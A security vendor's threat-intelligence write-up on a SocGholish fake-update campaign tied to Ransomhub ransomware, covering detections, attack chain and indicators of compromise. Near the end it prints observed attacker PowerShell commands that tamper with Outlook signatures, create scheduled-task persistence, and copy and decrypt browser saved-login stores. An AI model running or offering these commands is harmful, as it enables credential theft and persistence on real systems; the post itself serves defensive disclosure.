You may be familiar with SocGholish (MITRE S1124), a malicious fake browser update used to spread malware through javascript downloads. Blumira has been following this malware for some time, and this walkthrough is a summary of our recent observations based on detections and logs from our agent on a single lab device.
Starting early in 2025, we started to see a recurrence of suspicious file executions. These were the outcome of users downloading fake updates from websites that have been compromised, silently leading to an attacker gaining initial access. When users downloaded and executed these fake updates, they unknowingly launched malware on their systems. Fortunately, we observed several customers whose layered security measures automatically intercepted and blocked these attacks, halting any further exploitation. One particularly notable exploit caught our attention: after installation, it remained dormant for a brief period before exhibiting clear indicators of early-stage ransomware activity. Thankfully, all organizations that we observed in these cases were promptly alerted and able to respond in a timely and effective manner to contain and eradicate the attackers. Soon after reviewing the attack chains, the exploit observed seemed to be very similar to a new campaign of SocGholish malware leading to Ransomhub ransomware execution.
SocGholish has been active since 2017 and is operated by the initial access broker (IAB) Mustard Tempest (TA569). The malware has been pretty extensively documented as it has evolved over time. The use of “watering hole” (drive-by-compromise) attacks for initial access has been very effective, making it a popular malware. Many users never even realize they downloaded fake updates from a compromised website. In fact, the Center for Internet Security noted that it was observed as the top malware in Q4 of 2024 (CIS Blog).
Initially, we observed malicious JavaScript executions (MITRE T1059.007) containing SocGholish payloads. Our detections generated findings based on known suspicious file executions that alerted on the JavaScript files’ behaviors, allowing customers to take quick action to the infections before spreading. These files didn’t show as malicious when checked against VirusTotal at the time of the alerts but were communicating with a “.top” domain and known malicious IP infrastructure. Companies that had additional controls like DNS filtering in place had quick and often automated response actions for these initial access attacks: files were either killed/quarantined or the communicating domains were blocked immediately. This allowed customers to respond with some peace of mind.
The first interesting observation was that this file was an ‘Update[.]js’ download (similar to the file names previously observed), but it was obfuscated as a homoglyph attack (the raw filename actually reads as ‘Updаte.js’). Homoglyph attacks use special characters (or visually-similar characters from other languages) to spoof text that appears normal to human readers, while bypassing security filters that might otherwise trigger an alert/response (VirusTotal Link). Additionally, this file has a reputation of utilizing “long sleeps,” which is a way that malware avoids sandboxing and evades antivirus. Essentially, it is a delayed activation (lying dormant) for a period of time before beginning to carry out any objectives.
In this case, the alert was closed as benign. About 18 hours later, additional suspicious activity started generating alerts on the same host. This delay lines up with the “long sleeps” tactic, and after this dormancy, reconnaissance activity began. Alerts for ADFind (MITRE T1087.002) and Nltest (MITRE T1482) were promptly triggered, minutes apart on the same host. These sequential alerts signaled an evolving attack chain and promptly notified the customer, who isolated the compromised host and took response measures before any data exfiltration or ransomware execution could occur. This rapid intervention and mitigation were crucial in preventing a potentially devastating breach.
We observed additional maneuvers following the ADFind and Nltest activity that were particularly interesting. There was a new communicating domain (VirusTotal Link) not yet seen like the “.top” domains. We then saw Network Connections via pythonw.exe downloaded, unpacked to and executed from the ProgramData folder. These connections communicated with the now-known Ransomhub Python C2 Infrastructure (VT IP Link), which, at the time of this exploit, did have malicious reputations on VirusTotal. Amidst this activity, PowerShell commands ran that first created scheduled tasks for persistence and then attempted to dump and decrypt credentials from browsers, saving them to a rad<5-hex-chars>.tmp file (MITRE Link).
In their Threat Detection Report, RedCanary noted a specific "activity cluster" that involved SocGholish intrusions leading to Ransomhub activity. The attack chain is incredibly similar to what is reported in this TrendMicro article that was published after this particular attack. This additional "activity cluster" also noted credential harvesting via NTLM hashes, using a PowerShell command that looks for Outlook signature files and adds HTML code, including a link to an image file hosted in the attacker's infrastructure (NCC Group Article Link). According to RedCanary, "Once in place, when someone opens an email from the affected user...the recipient's email client may attempt to authenticate to the adversary infrastructure...enabling the adversary to harvest hashed credentials." A PowerShell command was also observed (MITRE T1187) related to this forced authentication/credential harvesting through Outlook.
Aligning with threat intelligence on SocGholish, each of these attacks spanned different industries. An initial access broker targeting a wide variety of sectors, accounting for over half of the observed malware in the last quarter, seems to be teaming up with a young though already notorious ransomware group. As threat actors evolve, details like these help inform detection development and improve security postures. Shortly after observing this last set of alerts, TrendMicro released their report, which documents the same attack chain as it worsened for victims, attributing the escalated activity to Ransomhub Ransomware. Thankfully, customers for whom we observed this activity did not experience this same ending due to either Blumira detections and alerts or layered security controls that were in place.
"C:\Windows\System32\cmd.exe" /C powershell -Command "Get-ChildItem "$env:APPDATA\Microsoft\Signatures\*.htm" | ForEach-Object {$content = Get-Content -Raw $_.FullName; $updatedContent = $content -replace '', ''; Set-Content -Path $_.FullName -Value $updatedContent}" > "C:\Users\\AppData\Local\Temp\rad862D0.tmp"
powershell -c "Expand-Archive -LiteralPath c:\programdata\python3.12.zip -DestinationPath c:\programdata;ls c:\programdata\python3.12" "C:\Windows\System32\cmd.exe" /C powershell -c "$randomName='Task_' + ([guid]::NewGuid().ToString().Substring(0,8)); $a=New-ScheduledTaskAction -WorkingDirectory 'c:\programdata\python3.12' -Execute 'pythonw.exe'; $t=New-ScheduledTaskTrigger -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Minutes 1); $s=New-ScheduledTaskSettingsSet -DontStopIfGoingOnBatteries -ExecutionTimeLimit '00:00:00' -AllowStartIfOnBatteries; Register-ScheduledTask -TaskName $randomName -Action $a -Trigger $t -Settings $s" > "C:\Users\\AppData\Local\Temp\rad72663.tmp"
"C:\Windows\System32\cmd.exe" /C powershell -c cat \"$env:APPDATA\\Mozilla\\Firefox\\Profiles\\*\\logins.json\" > "C:\Users\\AppData\Local\Temp\radBB236.tmp" "C:\Windows\System32\cmd.exe" /C powershell -c ls "C:\Users\\AppData\Local\Google\Chrome\'User Data'\*\'Login Data*'" > "C:\Users\\AppData\Local\Temp\radBB236.tmp" "C:\Windows\System32\cmd.exe" /C powershell -c ls "C:\Users\\AppData\Local\Microsoft\Edge\'User Data'\*\'Login Data*'" > "C:\Users\\AppData\Local\Temp\radBB236.tmp" "C:\Windows\System32\cmd.exe" /C powershell -c "$tmp=[System.IO.Path]::GetTempFileName();Get-Content -Raw -Encoding Byte \"$env:LOCALAPPDATA\\Google\\Chrome\\User Data\\Default\\Login Data\" | Set-Content -Encoding Byte $tmp; Write-Output $tmp" > "C:\Users\\AppData\Local\Temp\radBB236.tmp" "C:\Windows\System32\cmd.exe" /C powershell -c "$tmp=[System.IO.Path]::GetTempFileName();Get-Content -Raw -Encoding Byte \"$env:LOCALAPPDATA\\microsoft\\edge\\User Data\\Default\\Login Data\" | Set-Content -Encoding Byte $tmp; Write-Output $tmp" > "C:\Users\\AppData\Local\Temp\radBB236.tmp" "C:\Windows\System32\cmd.exe" /C powershell -c "$2=((gc "C:\Users\\AppData\Local\Google\Chrome\'User Data'\'Local State'").split(',')-replace'app_bound_encrypted_key',''|sls encrypted_key)-replace'\"}','' -replace'\"encrypted_key\":\"','' -replace'\"os_crypt\":{','';$3=[System.Convert]::FromBase64String($2);$3=$3[5..($3.length-1)];Add-Type -AssemblyName System.Security;[System.Security.Cryptography.ProtectedData]::Unprotect($3,$null,[Security.Cryptography.DataProtectionScope]::CurrentUser)" > "C:\Users\\AppData\Local\Temp\radBB236.tmp" "C:\Windows\System32\cmd.exe" /C powershell -c "$2=((gc "C:\Users\\AppData\Local\Microsoft\Edge\'User Data'\'Local State'").split(',')-replace'app_bound_encrypted_key',''|sls encrypted_key)-replace'\"}','' -replace'\"encrypted_key\":\"','' -replace'\"os_crypt\":{','';$3=[System.Convert]::FromBase64String($2);$3=$3[5..($3.length-1)];Add-Type -AssemblyName System.Security;[System.Security.Cryptography.ProtectedData]::Unprotect($3,$null,[Security.Cryptography.DataProtectionScope]::CurrentUser)" > "C:\Users\\AppData\Local\Temp\radBB236.tmp"
nazblog[.]top
nfwatches[.]top
cpanel[.]kreativelife[.]net
fesovalle[.]com/<redacted_filename>[.]jpeg
98[.]142[.]240[.]181
88[.]119[.]175[.]65
128[.]254[.]146[.]183
7625239d327caa956a2c11fb27d93fd3f56941c32c7bb4883f305c4577375335
4fa24b93e7895de715cddfcb5bfbe97df768b554bb4d4529283758ae92b6e86f
C123b36e36b83ffb33e5092a6e13df1b05edc89ac58462ad728d93369d1c8400